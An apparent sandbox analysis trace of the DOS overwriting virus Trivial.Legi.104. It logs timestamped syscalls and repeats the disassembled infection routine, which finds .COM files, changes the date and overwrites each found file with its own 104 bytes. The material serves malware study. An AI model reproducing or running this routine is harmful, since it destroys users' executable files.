Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Legi.104

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:29.713442856Z 78 PC: 12a47 | Find first file
2018-12-17T22:49:29.720382179Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.722515896Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.725856209Z 61 PC: 12a7f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:49:29.733990732Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.740199653Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.742128528Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.744773681Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.747944478Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.751288604Z 61 PC: 12a7f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:49:29.762948405Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.77019426Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.786591127Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.789628602Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.792436286Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.796073627Z 61 PC: 12a7f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:49:29.803877119Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.812986585Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.820904309Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.823467682Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.826013724Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.829217653Z 61 PC: 12a7f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:49:29.840317785Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.848535712Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.855956598Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.858660156Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.861612347Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.865534816Z 61 PC: 12a7f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:49:29.872055902Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.879502123Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.886795623Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.889240241Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.891828595Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.894695458Z 61 PC: 12a7f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:49:29.902091071Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.909659612Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.914829605Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.916607405Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.918557958Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.920658789Z 61 PC: 12a7f | Open file (Filename = 'PAH.COM')
2018-12-17T22:49:29.928019899Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.932849396Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.937864476Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.939472036Z 42 PC: 12a6c | Get date 0x12a6c: mov ah, 0x2b
0x12a6e: mov cx, 0x7d0
0x12a71: mov dh, 1
0x12a73: mov dl, 1
0x12a75: int 0x21
0x12a77: mov ax, 0x3d02
0x12a7a: mov dx, 0x9e
0x12a7d: int 0x21
0x12a7f: mov ah, 0x40
0x12a81: mov cx, 0x68
0x12a84: mov dx, 0x100
0x12a87: int 0x21
0x12a89: mov ah, 0x3e
0x12a8b: int 0x21
0x12a8d: ret
0x12a8e: sub ch, byte ptr [0x6f63]
0x12a92: insw word ptr es:[di], dx
0x12a93: add byte ptr [si + 0x45], cl
0x12a96: inc di
0x12a97: dec cx
2018-12-17T22:49:29.941554594Z 43 PC: 12a77 | Set date
2018-12-17T22:49:29.943762243Z 61 PC: 12a7f | Open file (Filename = 'TEST.COM')
2018-12-17T22:49:29.95052918Z 64 PC: 12a89 | Write file or device (Write 104 bytes on handle 0)
2018-12-17T22:49:29.954894469Z 62 PC: 12a8d | Close file
2018-12-17T22:49:29.959718082Z 79 PC: 12a47 | Find next file
2018-12-17T22:49:29.963050852Z 0 PC: 12a62 | Program terminate